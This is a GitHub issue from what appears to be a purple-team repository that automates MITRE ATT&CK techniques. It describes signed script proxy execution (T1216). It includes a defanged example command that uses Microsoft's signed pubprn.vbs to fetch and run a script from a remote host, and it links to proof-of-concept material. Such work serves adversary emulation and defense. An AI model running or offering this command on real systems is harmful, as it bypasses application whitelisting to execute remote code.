search

praetorian-inc / purple-team-attack-automation

Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs
Other
717 stars 118 forks source link

T1216W - Signed Script Proxy Execution #26

Open daniel-infosec opened 5 years ago

daniel-infosec commented 5 years ago

Description

Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.

PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. [1] Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

There are several other signed scripts that may be used in a similar manner. [2]

jabra- commented 5 years ago

blog post with sample pocs: https://p16.praetorian.com/blog/signed-scripts-proxy-execution-t1216